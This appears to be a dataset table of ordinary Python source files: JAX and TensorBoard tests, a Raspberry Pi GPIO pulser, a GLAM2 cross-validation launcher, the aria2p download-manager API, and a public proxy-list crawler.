| source (string, 3–86 chars) | python (string, 75–1.04M chars) |
|---|---|
infeed_test.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
from absl.testing import absltest
import jax
from jax import lax, numpy as np
from jax.config import config
from jax.lib import xla_client
import jax.test_util
import numpy as onp
config.parse_flags_with_absl()
FLAGS = config.FLAGS
class InfeedTest(jax.test_util.JaxTestCase):
def testInfeed(self):
@jax.jit
def f(x):
token = lax.create_token(x)
(y,), token = lax.infeed(
token, shape=(jax.ShapedArray((3, 4), np.float32),))
(z,), _ = lax.infeed(
token, shape=(jax.ShapedArray((3, 1, 1), np.float32),))
return x + y + z
x = onp.float32(1.5)
y = onp.reshape(onp.arange(12, dtype=onp.float32), (3, 4)) # onp.random.randn(3, 4).astype(onp.float32)
z = onp.random.randn(3, 1, 1).astype(onp.float32)
device = jax.local_devices()[0]
device.transfer_to_infeed((y,))
device.transfer_to_infeed((z,))
self.assertAllClose(f(x), x + y + z, check_dtypes=True)
def testInfeedThenOutfeed(self):
@jax.jit
def f(x):
token = lax.create_token(x)
y, token = lax.infeed(
token, shape=jax.ShapedArray((3, 4), np.float32))
token = lax.outfeed(token, y + onp.float32(1))
return lax.tie_in(token, x - 1)
x = onp.float32(7.5)
y = onp.random.randn(3, 4).astype(onp.float32)
execution = threading.Thread(target=lambda: f(x))
execution.start()
device = jax.local_devices()[0]
device.transfer_to_infeed((y,))
out, = device.transfer_from_outfeed(
xla_client.shape_from_pyval((y,)).with_major_to_minor_layout_if_absent())
execution.join()
self.assertAllClose(out, y + onp.float32(1), check_dtypes=True)
def testInfeedThenOutfeedInALoop(self):
def doubler(_, token):
y, token = lax.infeed(
token, shape=jax.ShapedArray((3, 4), np.float32))
return lax.outfeed(token, y * onp.float32(2))
@jax.jit
def f(n):
token = lax.create_token(n)
token = lax.fori_loop(0, n, doubler, token)
return lax.tie_in(token, n)
device = jax.local_devices()[0]
n = 10
execution = threading.Thread(target=lambda: f(n))
execution.start()
for _ in range(n):
x = onp.random.randn(3, 4).astype(onp.float32)
device.transfer_to_infeed((x,))
y, = device.transfer_from_outfeed(xla_client.shape_from_pyval((x,))
.with_major_to_minor_layout_if_absent())
self.assertAllClose(y, x * onp.float32(2), check_dtypes=True)
execution.join()
if __name__ == '__main__':
absltest.main()
|
pulseGPIO.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function, division, unicode_literals
from __future__ import absolute_import
import time
import sys
import RPi.GPIO as gpio
from multiprocessing import Process, Queue
class PulseGPIO(object):
"""Set Signal on Raspberry Pi GPIO pin"""
def pulseGPIOpin(self):
# sub-process to pulse GPIO pin
while True:
ton = self.Q.get() # wait for entry in Queue
# ton > 0: pin on for ton sec
# ton = 0: pin on
# ton < 0: pin off
if ton == 0:
gpio.output(self.pin, 1)
elif ton > 0:
gpio.output(self.pin, 1)
time.sleep(ton)
gpio.output(self.pin, 0)
else:
gpio.output(self.pin, 0)
def __init__(self, pin=None):
"""Args: pin: GPIO pin number
cmdQ: multiprocessing queue"""
gpio.setmode(gpio.BCM)
if pin is None:
print("pulseGPIO config error: no GPIO Pin specified - exiting")
sys.exit(1)
self.pin = pin
self.Q = Queue(1)
try:
gpio.setup(pin, gpio.OUT) # initialize GPIO pin for output
except Exception as e:
print("pulseGPIO Error setting up GPIO output")
print(e)
# start pulser as background process
self.subprocs = []
self.subprocs.append(Process(name='pulseGPIOpin',
target=self.pulseGPIOpin))
for p in self.subprocs:
p.daemon = True
p.start()
def pulse(self, ton=None):
# produce one pulse of duration <ton>
# default ton=0.05 sec
# ton > 0: pin on for ton sec
# ton = 0: pin on
# ton < 0: pin off
if ton is None:
ton = 0.05
if self.Q.empty():
self.Q.put(ton)
def close(self):
for p in self.subprocs:
if p.is_alive():
p.terminate()
        self.Q.close()
gpio.cleanup(self.pin)
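# A minimal usage sketch of the ton semantics documented in pulse(). It is an
# illustration only and assumes a Raspberry Pi with something observable (an LED
# or a scope) wired to the hypothetical BCM pin 18; adjust the pin for your setup.
if __name__ == '__main__':
    pulser = PulseGPIO(pin=18)
    pulser.pulse()        # one pulse with the default duration of 0.05 s
    time.sleep(0.5)
    pulser.pulse(0.2)     # one pulse of 0.2 s
    time.sleep(0.5)
    pulser.pulse(0)       # switch the pin on ...
    time.sleep(1.0)
    pulser.pulse(-1)      # ... and off again
    time.sleep(0.5)
    pulser.close()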
|
launch_glam2_cross.py
|
#
# Copyright John Reid 2009
#
"""
Code to launch the GLAM2 algorithm on the cross-validation of several fragments concurrently.
"""
import os, subprocess, logging, sys, Queue, threading
from optparse import OptionParser
from glam2 import *
#
# Initialise the logging
#
format='%(asctime)-15s %(message)s'
logging.basicConfig(level=logging.INFO, format=format)
file_handler = logging.FileHandler('launch_glam2_cross_validate.log')
file_handler.setFormatter(logging.Formatter(format))
logging.getLogger('').addHandler(file_handler)
logging.info('Command line: %s', ' '.join(sys.argv))
logging.info('Current working directory: %s', os.getcwd())
#
# Parse the options
#
option_parser = OptionParser()
option_parser.add_option(
"-j",
"--num-threads",
dest="num_threads",
type='int',
default=5,
help="How many threads to run."
)
option_parser.add_option(
"-n",
dest="n",
type='int',
default=5000000,
help="How many iterations to wait without improvement before stopping."
)
option_parser.add_option(
"-f",
"--num-folds",
dest="num_folds",
type='int',
default=5,
help="How many folds in the cross validation."
)
option_parser.add_option(
"-s",
"--num-seeds",
dest="num_seeds",
type='int',
default=8,
help="How many seeds to use."
)
options, args = option_parser.parse_args()
for option in option_parser.option_list:
if option.dest:
logging.info('%30s: %30s (%s)', option.dest, str(getattr(options, option.dest)), option.help)
data_dir = args.pop(0)
fragments = args
logging.info('Data directory: %s' % data_dir)
logging.info('Fragments: %s' % ' '.join(fragments))
def worker():
while True:
fragment, cross_fold_index, seed = q.get()
try:
tag = make_tag(fragment, cross_fold_index, seed)
fasta = os.path.join(data_dir, '%strimRM-train-x%d.fa' % (fragment, cross_fold_index))
args = [
'glam2', '-2', '-r', '1', '-I', '.1', '-J', '99999.0',
'-n', str(options.n),
'-s', str(seed),
'n', fasta
]
logging.info('%s: Executing: %s', tag, ' '.join(args))
output_file = output_filename(fragment, cross_fold_index, seed)
logging.info('%s: Sending output to: %s', tag, output_file)
output = open(output_file, 'w')
process = subprocess.Popen(args, stdout=output)
process.wait()
output.close()
retcode = process.returncode
if 0 != retcode:
logging.error('%s: Exit status: %d: %s', tag, retcode, args)
except:
type, value, traceback = sys.exc_info()
logging.error('%s: Exception (%s) caught: %s', tag, type, value)
sys.exc_clear()
q.task_done()
q = Queue.Queue()
for i in range(options.num_threads):
t = threading.Thread(target=worker)
t.setDaemon(True)
t.start()
for fragment in fragments:
for cross_fold_index in xrange(1, options.num_folds+1):
for seed in xrange(1, options.num_seeds+1):
q.put((fragment, cross_fold_index, seed))
q.join() # block until all tasks are done
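#
# Example invocation sketch (the data directory and fragment names are purely
# illustrative); the training files are expected to be named
# <fragment>trimRM-train-x<fold>.fa inside the data directory:
#
#   python launch_glam2_cross.py -j 4 -f 5 -s 8 /path/to/data FRAGMENT_A FRAGMENT_B
#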
|
grpc_util_test.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `tensorboard.util.grpc_util`."""
import contextlib
import hashlib
import threading
from concurrent import futures
import grpc
from tensorboard.util import grpc_util
from tensorboard.util import grpc_util_test_pb2
from tensorboard.util import grpc_util_test_pb2_grpc
from tensorboard.util import test_util
from tensorboard import test as tb_test
from tensorboard import version
def make_request(nonce):
return grpc_util_test_pb2.TestRpcRequest(nonce=nonce)
def make_response(nonce):
return grpc_util_test_pb2.TestRpcResponse(nonce=nonce)
class TestGrpcServer(grpc_util_test_pb2_grpc.TestServiceServicer):
"""Helper for testing gRPC client logic with a dummy gRPC server."""
def __init__(self, handler):
super(TestGrpcServer, self).__init__()
self._handler = handler
def TestRpc(self, request, context):
return self._handler(request, context)
@contextlib.contextmanager
def run(self):
"""Context manager to run the gRPC server and yield a client for it."""
server = grpc.server(futures.ThreadPoolExecutor(max_workers=1))
grpc_util_test_pb2_grpc.add_TestServiceServicer_to_server(self, server)
port = server.add_secure_port(
"localhost:0", grpc.local_server_credentials()
)
def launch_server():
server.start()
server.wait_for_termination()
thread = threading.Thread(target=launch_server, name="TestGrpcServer")
thread.daemon = True
thread.start()
with grpc.secure_channel(
"localhost:%d" % port, grpc.local_channel_credentials()
) as channel:
yield grpc_util_test_pb2_grpc.TestServiceStub(channel)
server.stop(grace=None)
thread.join()
class CallWithRetriesTest(tb_test.TestCase):
def test_call_with_retries_succeeds(self):
def handler(request, _):
return make_response(request.nonce)
server = TestGrpcServer(handler)
with server.run() as client:
response = grpc_util.call_with_retries(
client.TestRpc, make_request(42)
)
self.assertEqual(make_response(42), response)
def test_call_with_retries_fails_immediately_on_permanent_error(self):
def handler(_, context):
context.abort(grpc.StatusCode.INTERNAL, "foo")
server = TestGrpcServer(handler)
with server.run() as client:
with self.assertRaises(grpc.RpcError) as raised:
grpc_util.call_with_retries(client.TestRpc, make_request(42))
self.assertEqual(grpc.StatusCode.INTERNAL, raised.exception.code())
self.assertEqual("foo", raised.exception.details())
def test_call_with_retries_fails_after_backoff_on_nonpermanent_error(self):
attempt_times = []
fake_time = test_util.FakeTime()
def handler(_, context):
attempt_times.append(fake_time.time())
context.abort(grpc.StatusCode.UNAVAILABLE, "foo")
server = TestGrpcServer(handler)
with server.run() as client:
with self.assertRaises(grpc.RpcError) as raised:
grpc_util.call_with_retries(
client.TestRpc, make_request(42), fake_time
)
self.assertEqual(grpc.StatusCode.UNAVAILABLE, raised.exception.code())
self.assertEqual("foo", raised.exception.details())
self.assertLen(attempt_times, 5)
self.assertBetween(attempt_times[1] - attempt_times[0], 2, 4)
self.assertBetween(attempt_times[2] - attempt_times[1], 4, 8)
self.assertBetween(attempt_times[3] - attempt_times[2], 8, 16)
self.assertBetween(attempt_times[4] - attempt_times[3], 16, 32)
def test_call_with_retries_succeeds_after_backoff_on_transient_error(self):
attempt_times = []
fake_time = test_util.FakeTime()
def handler(request, context):
attempt_times.append(fake_time.time())
if len(attempt_times) < 3:
context.abort(grpc.StatusCode.UNAVAILABLE, "foo")
return make_response(request.nonce)
server = TestGrpcServer(handler)
with server.run() as client:
response = grpc_util.call_with_retries(
client.TestRpc, make_request(42), fake_time
)
self.assertEqual(make_response(42), response)
self.assertLen(attempt_times, 3)
self.assertBetween(attempt_times[1] - attempt_times[0], 2, 4)
self.assertBetween(attempt_times[2] - attempt_times[1], 4, 8)
def test_call_with_retries_includes_version_metadata(self):
def digest(s):
"""Hashes a string into a positive 32-bit signed integer."""
return (
int(hashlib.sha256(s.encode("utf-8")).hexdigest(), 16)
& 0x7FFFFFFF
)
def handler(request, context):
metadata = context.invocation_metadata()
client_version = grpc_util.extract_version(metadata)
return make_response(digest(client_version))
server = TestGrpcServer(handler)
with server.run() as client:
response = grpc_util.call_with_retries(
client.TestRpc, make_request(0)
)
expected_nonce = digest(
grpc_util.extract_version(grpc_util.version_metadata())
)
self.assertEqual(make_response(expected_nonce), response)
class VersionMetadataTest(tb_test.TestCase):
def test_structure(self):
result = grpc_util.version_metadata()
self.assertIsInstance(result, tuple)
for kv in result:
self.assertIsInstance(kv, tuple)
self.assertLen(kv, 2)
(k, v) = kv
self.assertIsInstance(k, str)
self.assertIsInstance(v, str)
def test_roundtrip(self):
result = grpc_util.extract_version(grpc_util.version_metadata())
self.assertEqual(result, version.VERSION)
class ChannelCredsTypeTest(tb_test.TestCase):
def test_all_variants_have_configs(self):
for variant in grpc_util.ChannelCredsType.__members__.values():
(creds, options) = variant.channel_config()
self.assertIsInstance(creds, grpc.ChannelCredentials)
self.assertIsInstance(options, list)
if __name__ == "__main__":
tb_test.main()
|
api.py
|
"""
This module defines the API class, which makes use of a JSON-RPC client to provide higher-level methods to
interact easily with a remote aria2c process.
"""
import shutil
import threading
from base64 import b64encode
from pathlib import Path
from loguru import logger
from .client import Client, ClientException
from .downloads import Download
from .options import Options
from .stats import Stats
from .utils import get_version
class API:
"""
A class providing high-level methods to interact with a remote aria2c process.
This class is instantiated with a reference to a :class:`~aria2p.client.Client` instance. It then uses this client
to call remote procedures, or remote methods. While the client methods reflect exactly what aria2c is providing
through JSON-RPC, this class's methods allow for easier / faster control of the remote process. It also
    wraps the information the client retrieves in Python objects, like :class:`~aria2p.downloads.Download`, allowing for
    even more Pythonic interactions, without worrying about payloads, responses, JSON, etc.
"""
def __init__(self, client=None):
"""
Initialization method.
Args:
client (:class:`~aria2p.client.Client`): an instance of the ``Client`` class.
"""
if client is None:
client = Client()
self.client = client
self.listener = None
def __repr__(self):
return f"API({self.client!r})"
def add_magnet(self, magnet_uri, options=None, position=None):
"""
Add a download with a Magnet URI.
Args:
magnet_uri (str): the Magnet URI.
options (:class:`~aria2p.options.Options` or dict): an instance of the ``Options`` class or a dictionary
containing aria2c options to create the download with.
position (int): the position where to insert the new download in the queue. Start at 0 (top).
Returns:
:class:`~aria2p.downloads.Download` instance: the newly created download object.
"""
if options is None:
options = {}
if isinstance(options, Options):
client_options = options.get_struct()
else:
client_options = options
gid = self.client.add_uri([magnet_uri], client_options, position)
return self.get_download(gid)
def add_torrent(self, torrent_file_path, uris=None, options=None, position=None):
"""
Add a download with a torrent file (usually .torrent extension).
Args:
torrent_file_path (str/Path): the path to the torrent file.
uris (list of str): a list of URIs used for Web-seeding.
options (:class:`~aria2p.options.Options` or dict): an instance of the ``Options`` class or a dictionary
containing aria2c options to create the download with.
position (int): the position where to insert the new download in the queue. Start at 0 (top).
Returns:
:class:`~aria2p.downloads.Download` instance: the newly created download object.
"""
if uris is None:
uris = []
if options is None:
options = {}
if isinstance(options, Options):
client_options = options.get_struct()
else:
client_options = options
with open(torrent_file_path, "rb") as stream:
torrent_contents = stream.read()
encoded_contents = b64encode(torrent_contents).decode("utf8")
gid = self.client.add_torrent(encoded_contents, uris, client_options, position)
return self.get_download(gid)
def add_metalink(self, metalink_file_path, options=None, position=None):
"""
Add a download with a Metalink file.
Args:
metalink_file_path (str/Path): the path to the Metalink file.
options (:class:`~aria2p.options.Options` or dict): an instance of the ``Options`` class or a dictionary
containing aria2c options to create the download with.
position (int): the position where to insert the new download in the queue. Start at 0 (top).
Returns:
list of :class:`~aria2p.downloads.Download`: the newly created download objects.
"""
if options is None:
options = {}
if isinstance(options, Options):
client_options = options.get_struct()
else:
client_options = options
with open(metalink_file_path, "rb") as stream:
metalink_contents = stream.read()
encoded_contents = b64encode(metalink_contents).decode("utf8")
gids = self.client.add_metalink(encoded_contents, client_options, position)
return self.get_downloads(gids)
def add_uris(self, uris, options=None, position=None):
"""
Add a download with a URL (or more).
Args:
uris (list of str): a list of URIs that point to the same resource.
options (:class:`~aria2p.options.Options` or dict): an instance of the ``Options`` class or a dictionary
containing aria2c options to create the download with.
position (int): the position where to insert the new download in the queue. Start at 0 (top).
Returns:
:class:`~aria2p.downloads.Download` instance: the newly created download object.
"""
if options is None:
options = {}
if isinstance(options, Options):
client_options = options.get_struct()
else:
client_options = options
gid = self.client.add_uri(uris, client_options, position)
return self.get_download(gid)
def search(self, patterns):
"""
Not implemented.
Search and return :class:`~aria2p.downloads.Download` object based on multiple patterns.
Args:
patterns (list of dict): the patterns used to filter the download list.
Returns:
list of :class:`~aria2p.downloads.Download` instances: the download objects matching the patterns.
"""
# gid
# status
# totalLength
# completedLength
# uploadLength
# bitfield
# downloadSpeed
# uploadSpeed
# infoHash
# numSeeders
# seeder
# pieceLength
# numPieces
# connections
# errorCode
# errorMessage
# followedBy
# following
# belongsTo
# dir
# files
# bittorrent
# announceList
# comment
# creationDate
# mode
# info
# name
# verifiedLength
# verifyIntegrityPending
raise NotImplementedError
def get_download(self, gid):
"""
Get a :class:`~aria2p.downloads.Download` object thanks to its GID.
Args:
gid (str): the GID of the download to get.
Returns:
:class:`~aria2p.downloads.Download` instance: the retrieved download object.
"""
return Download(self, self.client.tell_status(gid))
def get_downloads(self, gids=None):
"""
        Get a list of :class:`~aria2p.downloads.Download` objects thanks to their GIDs.
Args:
gids (list of str): the GIDs of the downloads to get. If None, return all the downloads.
Returns:
list of :class:`~aria2p.downloads.Download` instances: the retrieved download objects.
"""
downloads = []
if gids:
for gid in gids:
downloads.append(Download(self, self.client.tell_status(gid)))
else:
structs = []
structs.extend(self.client.tell_active())
structs.extend(self.client.tell_waiting(0, 1000))
structs.extend(self.client.tell_stopped(0, 1000))
downloads = [Download(self, struct) for struct in structs]
return downloads
def move(self, download, pos):
"""
        Move a download in the queue, relative to its current position.
Args:
download (:class:`~aria2p.downloads.Download`): the download object to move.
pos (int): the relative position (1 to move down, -1 to move up, -2 to move up two times, etc.).
Returns:
int: The new position of the download.
"""
return self.client.change_position(download.gid, pos, "POS_CUR")
def move_to(self, download, pos):
"""
Move a download in the queue, with absolute positioning.
Args:
download (:class:`~aria2p.downloads.Download`): the download object to move.
pos (int): the absolute position in the queue where to move the download. 0 for top, -1 for bottom.
Returns:
int: The new position of the download.
"""
if pos < 0:
how = "POS_END"
pos = -pos
else:
how = "POS_SET"
return self.client.change_position(download.gid, pos, how)
def move_up(self, download, pos=1):
"""
Move a download up in the queue.
Args:
download (:class:`~aria2p.downloads.Download`): the download object to move.
pos (int): number of times to move up. With negative values, will move down (use move or move_down instead).
Returns:
int: The new position of the download.
"""
return self.client.change_position(download.gid, -pos, "POS_CUR")
def move_down(self, download, pos=1):
"""
Move a download down in the queue.
Args:
download (:class:`~aria2p.downloads.Download`): the download object to move.
pos (int): number of times to move down. With negative values, will move up (use move or move_up instead).
Returns:
int: The new position of the download.
"""
return self.client.change_position(download.gid, pos, "POS_CUR")
def move_to_top(self, download):
"""
Move a download to the top of the queue.
Args:
download (:class:`~aria2p.downloads.Download`): the download object to move.
Returns:
int: The new position of the download.
"""
return self.client.change_position(download.gid, 0, "POS_SET")
def move_to_bottom(self, download):
"""
Move a download to the bottom of the queue.
Args:
download (:class:`~aria2p.downloads.Download`): the download object to move.
Returns:
int: The new position of the download.
"""
return self.client.change_position(download.gid, 0, "POS_END")
def remove(self, downloads, force=False, files=False, clean=True):
"""
Remove the given downloads from the list.
Args:
downloads (list of :class:`~aria2p.downloads.Download`): the list of downloads to remove.
force (bool): whether to force the removal or not.
files (bool): whether to remove downloads files as well.
clean (bool): whether to remove the aria2 control file as well.
Returns:
list of bool: Success or failure of the operation for each given download.
"""
# TODO: batch/multicall candidate
if force:
remove_func = self.client.force_remove
else:
remove_func = self.client.remove
result = []
for download in downloads:
if download.is_complete or download.is_removed or download.has_failed:
logger.debug(f"Try to remove download result {download.gid}")
try:
self.client.remove_download_result(download.gid)
except ClientException as error:
logger.exception(error)
result.append(error)
else:
logger.success(f"Removed download result {download.gid}")
result.append(True)
else:
logger.debug(f"Try to remove download {download.gid}")
try:
removed_gid = remove_func(download.gid)
except ClientException as error:
logger.exception(error)
result.append(error)
else:
logger.success(f"Removed download {download.gid}")
result.append(True)
try:
self.client.remove_download_result(download.gid)
except ClientException as error2:
logger.debug(f"Failed to remove download result {download.gid}")
logger.opt(exception=True).trace(error2)
if removed_gid != download.gid:
logger.debug(
f"Removed download GID#{removed_gid} is different than download GID#{download.gid}"
)
try:
self.client.remove_download_result(removed_gid)
except ClientException as error2:
logger.debug(f"Failed to remove download result {removed_gid}")
logger.opt(exception=True).trace(error2)
if clean:
# FUTURE: use missing_ok parameter on Python 3.8
try:
download.control_file_path.unlink()
except FileNotFoundError:
logger.debug(f"aria2 control file {download.control_file_path} was not found")
else:
logger.debug(f"Removed control file {download.control_file_path}")
if files and result[-1]:
self.remove_files([download], force=True)
return result
def remove_all(self, force=False):
"""
Remove all downloads from the list.
Args:
force (bool): whether to force the removal or not.
Returns:
bool: Success or failure of the operation to remove all downloads.
"""
return all(self.remove(self.get_downloads(), force=force))
def pause(self, downloads, force=False):
"""
        Pause the given downloads.
        Args:
            downloads (list of :class:`~aria2p.downloads.Download`): the list of downloads to pause.
force (bool): whether to pause immediately without contacting servers or not.
Returns:
list of bool: Success or failure of the operation for each given download.
"""
# TODO: batch/multicall candidate
if force:
pause_func = self.client.force_pause
else:
pause_func = self.client.pause
result = []
for download in downloads:
try:
pause_func(download.gid)
except ClientException as error:
logger.debug(f"Failed to pause download {download.gid}")
logger.opt(exception=True).trace(error)
result.append(error)
else:
result.append(True)
return result
def pause_all(self, force=False):
"""
        Pause all downloads.
Args:
force (bool): whether to pause immediately without contacting servers or not.
Returns:
bool: Success or failure of the operation to pause all downloads.
"""
if force:
pause_func = self.client.force_pause_all
else:
pause_func = self.client.pause_all
return pause_func() == "OK"
def resume(self, downloads):
"""
Resume (unpause) the given downloads.
Args:
downloads (list of :class:`~aria2p.downloads.Download`): the list of downloads to resume.
Returns:
list of bool: Success or failure of the operation for each given download.
"""
# TODO: batch/multicall candidate
result = []
for download in downloads:
try:
self.client.unpause(download.gid)
except ClientException as error:
logger.debug(f"Failed to resume download {download.gid}")
logger.opt(exception=True).trace(error)
result.append(error)
else:
result.append(True)
return result
def resume_all(self):
"""
Resume (unpause) all downloads.
Returns:
bool: Success or failure of the operation to resume all downloads.
"""
return self.client.unpause_all() == "OK"
def autopurge(self):
"""
Purge completed, removed or failed downloads from the queue.
Returns:
bool: Success or failure of the operation.
"""
version = get_version()
if version.major == 0 and 9 > version.minor >= 7:
logger.warning("Future change warning: API method 'autopurge' will be renamed 'purge' in version 0.9.0.")
return self.client.purge_download_result()
def purge(self, downloads):
"""
Purge given downloads from the queue.
Returns:
list of bool: Success or failure of the operation for each download.
"""
# TODO: batch/multicall candidate
logger.warning(
"Deprecation warning: API method 'purge' is deprecated in favor of method 'remove', "
"and will be removed in version 0.7.0."
)
result = []
for download in downloads:
try:
self.client.remove_download_result(download.gid)
except ClientException as error:
logger.exception(error)
result.append(error)
else:
result.append(True)
return result
def purge_all(self):
"""
Purge all downloads from the list.
Returns:
bool: Success or failure of the operation to purge all downloads.
"""
logger.warning(
"Deprecation warning: API method 'purge_all' is deprecated, and will be removed in version 0.7.0."
)
return all(self.purge(self.get_downloads()))
def get_options(self, downloads):
"""
Get options for each of the given downloads.
Args:
downloads (list of :class:`~aria2p.downloads.Download`): the list of downloads to get the options of.
Returns:
list of :class:`~aria2p.options.Options`: options object for each given download.
"""
# TODO: batch/multicall candidate
options = []
for download in downloads:
options.append(Options(self, self.client.get_option(download.gid), download))
return options
def get_global_options(self):
"""
Get the global options.
Returns:
:class:`~aria2p.options.Options` instance: the global aria2c options.
"""
return Options(self, self.client.get_global_option())
def set_options(self, options, downloads):
"""
Set options for specific downloads.
Args:
options (:class:`~aria2p.options.Options` or dict): an instance of the ``Options`` class or a dictionary
containing aria2c options to create the download with.
downloads (list of :class:`~aria2p.downloads.Download`): the list of downloads to set the options for.
Returns:
list of bool: Success or failure of the operation for changing options for each given download.
"""
if isinstance(options, Options):
client_options = options.get_struct()
else:
client_options = options
# TODO: batch/multicall candidate
results = []
for download in downloads:
results.append(self.client.change_option(download.gid, client_options) == "OK")
return results
def set_global_options(self, options):
"""
Set global options.
Args:
options (:class:`~aria2p.options.Options` or dict): an instance of the ``Options`` class or a dictionary
containing aria2c options to create the download with.
Returns:
bool: Success or failure of the operation for changing global options.
"""
if isinstance(options, Options):
client_options = options.get_struct()
else:
client_options = options
return self.client.change_global_option(client_options) == "OK"
def get_stats(self):
"""
Get the stats of the remote aria2c process.
Returns:
:class:`~aria2p.stats.Stats` instance: the global stats returned by the remote process.
"""
return Stats(self.client.get_global_stat())
@staticmethod
def remove_files(downloads, force=False):
"""
Remove downloaded files.
Args:
downloads (list of :class:`~aria2p.downloads.Download`): the list of downloads for which to remove files.
force (bool): whether to remove files even if download is not complete.
Returns:
list of bool: Success or failure of the operation for each given download.
"""
results = []
for download in downloads:
if download.is_complete or force:
for path in download.root_files_paths:
if path.is_dir():
shutil.rmtree(str(path))
else:
path.unlink()
results.append(True)
else:
results.append(False)
return results
@staticmethod
def move_files(downloads, to_directory, force=False):
"""
Move downloaded files to another directory.
Args:
downloads (list of :class:`~aria2p.downloads.Download`): the list of downloads for which to move files.
to_directory (str/Path): the target directory to move files to.
force (bool): whether to move files even if download is not complete.
Returns:
list of bool: Success or failure of the operation for each given download.
"""
if isinstance(to_directory, str):
to_directory = Path(to_directory)
# raises FileExistsError when target is already a file
to_directory.mkdir(parents=True, exist_ok=True)
results = []
for download in downloads:
if download.is_complete or force:
for path in download.root_files_paths:
shutil.move(str(path), str(to_directory))
results.append(True)
else:
results.append(False)
return results
@staticmethod
def copy_files(downloads, to_directory, force=False):
"""
Copy downloaded files to another directory.
Args:
            downloads (list of :class:`~aria2p.downloads.Download`): the list of downloads for which to copy files.
to_directory (str/Path): the target directory to copy files into.
            force (bool): whether to copy files even if the download is not complete.
Returns:
list of bool: Success or failure of the operation for each given download.
"""
if isinstance(to_directory, str):
to_directory = Path(to_directory)
# raises FileExistsError when target is already a file
to_directory.mkdir(parents=True, exist_ok=True)
results = []
for download in downloads:
if download.is_complete or force:
for path in download.root_files_paths:
if path.is_dir():
shutil.copytree(str(path), str(to_directory / path.name))
elif path.is_file():
shutil.copy(str(path), str(to_directory))
results.append(True)
else:
results.append(False)
return results
def listen_to_notifications(self, threaded=False, **kwargs):
"""
Start listening to aria2 notifications via WebSocket.
This method differs from :meth:`~aria2p.client.Client.listen_to_notifications` in that it expects callbacks
accepting two arguments, ``api`` and ``gid``, instead of only ``gid``.
        Accepting ``api`` makes it possible to use the high-level methods of the :class:`~aria2p.api.API` class.
Stop listening to notifications with the :meth:`~aria2p.api.API.stop_listening` method.
Args:
threaded (bool): Whether to start the listening loop in a thread or not (non-blocking or blocking).
"""
def closure(callback):
return (lambda gid: callback(self, gid)) if callable(callback) else None
def run():
self.client.listen_to_notifications(
**{key: closure(value) if key.startswith("on_") else value for key, value in kwargs.items()}
)
if threaded:
kwargs["handle_signals"] = False
self.listener = threading.Thread(target=run)
self.listener.start()
else:
run()
def stop_listening(self):
"""
Stop listening to notifications.
If the listening loop was threaded, this method will wait for the thread to finish.
The time it takes for the thread to finish will depend on the timeout given while calling
:meth:`~aria2p.api.API.listen_to_notifications`.
"""
self.client.stop_listening()
if self.listener:
self.listener.join()
self.listener = None
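# A minimal usage sketch, not part of the library itself. It assumes a local
# aria2c process started with --enable-rpc and reachable with the default
# Client() settings; the URL below is purely illustrative.
#
#   from aria2p.api import API
#
#   api = API()
#   download = api.add_uris(["http://example.com/file.iso"])
#   print(download.gid, download.is_complete)
#   api.pause([download])
#   api.resume([download])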
|
crawler.py
|
import time
import json
import re
import datetime
import threading
import requests
from lxml import etree
from config import configger
from verification import verify
from storage import ProxyInstance
from webapi import APIMiddleware
class CrawlerMeta(object):
def __init__(self, *args, **kwargs):
self.headers = {
'User-Agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Mobile Safari/537.36',
}
self.api_mdw = APIMiddleware()
def check_alive(self):
        # Once both proxy pools have reached their upper bounds the crawler can
        # stop; otherwise it has to keep working (hysteresis, like a Schmitt trigger).
        if self.api_mdw.get_len('ggl') >= configger.STORAGE_GOOGLE_UPPER_BOUND \
                and self.api_mdw.get_len('non') >= configger.STORAGE_NONGOOGLE_UPPER_BOUND:
return False
else:
return True
def download(self, *args, **kwargs):
pass
def parse(self, *args, **kwargs):
pass
def save(self, obj):
self.api_mdw.save(obj)
def run(self):
pass
class hookzof_socks5_list(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(hookzof_socks5_list, self).__init__(*args, **kwargs)
self.base_url = 'https://raw.githubusercontent.com/hookzof/socks5_list/master/proxy.txt'
self.protocol = 'socks5'
def download(self):
response = requests.get(self.base_url, headers=self.headers)
response.raise_for_status()
return response.text.split('\n')
def parse(self, lines):
proxies = []
for line in lines:
line = line.strip()
if len(line.split(':')) == 2:
px = ProxyInstance(ip=line.split(':')[0],
port=line.split(':')[1],
protocol='socks5')
proxies.append(px)
return proxies
def run(self):
print('hookzof_socks5_list')
if not self.check_alive():
return
texts = self.download()
objs = self.parse(texts)
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class dxxzst_free_proxy_list(CrawlerMeta):
def __init__(self, *args, **kwargs):
        super(dxxzst_free_proxy_list, self).__init__(*args, **kwargs)
self.base_url = 'https://raw.githubusercontent.com/dxxzst/free-proxy-list/master/README.md'
def download(self):
response = requests.get(self.base_url, headers=self.headers)
response.raise_for_status()
return response.text
def parse(self, text):
resultset = []
rs = re.findall(r'\|\d+\.\d+\.\d+\.\d+\|\d+\|https?\|.*?\|.*?\|', text)
for r in rs:
r = r.strip()
r_ = r.split('|')
px = ProxyInstance(ip=r_[1],
port=r_[2],
protocol=r_[3],
anonymity=r_[4],
location=r_[5])
resultset.append(px)
return resultset
def run(self):
print('dxxzst_free_proxy_list')
if not self.check_alive():
return
text = self.download()
objs = self.parse(text)
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
